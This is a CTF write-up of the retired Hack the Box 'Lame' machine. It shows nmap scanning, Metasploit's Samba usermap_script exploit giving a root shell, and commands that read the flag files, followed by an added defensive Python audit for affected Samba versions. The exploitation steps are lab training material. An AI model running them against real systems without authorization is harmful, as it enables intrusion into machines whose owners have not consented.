jesusbarrios
Hello friends!! Today we are going to solve another CTF challenge, "Lame", a lab presented by Hack the Box for practicing penetration testing online according to your experience level. They have a collection of vulnerable labs as challenges, from Beginner to Expert level. HTB has two partitions of labs, i.e. Active and Retired; since we can't submit a write-up of any Active lab, we have chosen the retired Lame lab.
Level: Beginners
Task: find the user.txt and root.txt files on the victim's machine.
Let's begin the Game!!
Since these labs are available online, they have static IPs; the IP of Lame is 10.10.10.3, so let's begin with nmap port enumeration.
Code:
nmap -sV 10.10.10.3
From the image given below, you can observe that we found so many open ports, such as 21 for ftp, 22 for ssh, 139 and 445 for the samba service, and also got a hint that the OS platform can be Unix or Linux.

From the nmap result we saw that the samba service smbd 3.x is running on the victim's machine, so next I searched Google for any exploit related to this service.
Gratefully, Google gave me a hint in its 2nd link, from Exploit DB.

Then I ran the msfconsole command in the terminal and loaded the Metasploit framework to use the Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution module for exploiting the target machine.
Code:
use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > set rhost 10.10.10.3
msf exploit(multi/samba/usermap_script) > exploit
Terrific!! I have got unauthorized access to the victim's command shell through session 1, as shown in the image below.
I upgraded the command shell to a meterpreter shell by executing the following command.
Code:
sessions -u 1

Inside the path /home/makis I found the user.txt file and used the cat "filename" command to read it.
Code:
cd /home
ls
cd makis
ls
cat user.txt
Great!! We got our 1st flag successfully

Inside the path /root I found the root.txt file and used the cat "filename" command to read it.
Code:
cd /root
ls
cat root.txt
Great!! We got our 2nd flag successfully
It will be a very stress-free challenge for any candidate who has a little knowledge of vulnerability analysis.
Happy Hacking!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a Social Media and Gadgets Lover.
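
From the defender's side of the write-up above: the module title names both an affected version range (Samba 3.0.20 < 3.0.25rc3) and the smb.conf option `username map script`. The following audit is an added example, not part of the original write-up or of any project's code. It flags hosts whose smbd version falls in that range and that have the option active. Host names, file paths and the inclusive reading of the range are assumptions of the example.

```python
import re

# Range from the module title quoted in the write-up; treating both ends as
# inclusive is an assumption of this example.
LOW, HIGH = "3.0.20", "3.0.25rc3"

def version_key(text):
    """Sortable key for '3.0.25rc3' or 'Version 3.0.20-Debian'.
    Letter suffixes (3.0.23d) are ignored; neither range bound has one."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:(pre|rc)(\d+))?", text)
    if not m:
        raise ValueError(f"no Samba version in {text!r}")
    nums = tuple(int(m.group(i)) for i in (1, 2, 3))
    # pre < rc < final release of the same x.y.z
    stage = {"pre": 0, "rc": 1, None: 2}[m.group(4)]
    return nums + (stage, int(m.group(5) or 0))

def username_map_script(conf_text):
    """Return the active 'username map script' value from smb.conf, or None."""
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;" or "=" not in line:
            continue  # blank line, comment, or section header
        key, value = line.split("=", 1)
        # smb.conf parameter names ignore case and embedded spaces
        if "".join(key.lower().split()) == "usernamemapscript" and value.strip():
            return value.strip()
    return None

def assess(version_text, conf_text):
    in_range = version_key(LOW) <= version_key(version_text) <= version_key(HIGH)
    script = username_map_script(conf_text)
    if in_range and script:
        return "exposed"   # affected build with the option active: fix first
    if in_range:
        return "upgrade"   # affected build, option not set
    return "review" if script else "ok"

# Constructed sample inventory: host -> (smbd version string, smb.conf text)
SAMPLE_HOSTS = {
    "files01": ("Version 3.0.20-Debian",
                "[global]\n  username map script = /etc/samba/mapusers.sh\n"),
    "files02": ("Version 3.0.24", "[global]\n; username map script = /bin/echo\n"),
    "files03": ("Version 3.0.25", "[global]\n  workgroup = LAB\n"),
}

def audit(hosts):
    return {name: assess(ver, conf) for name, (ver, conf) in hosts.items()}

if __name__ == "__main__":
    for host, verdict in audit(SAMPLE_HOSTS).items():
        print(f"{host}: {verdict}")
```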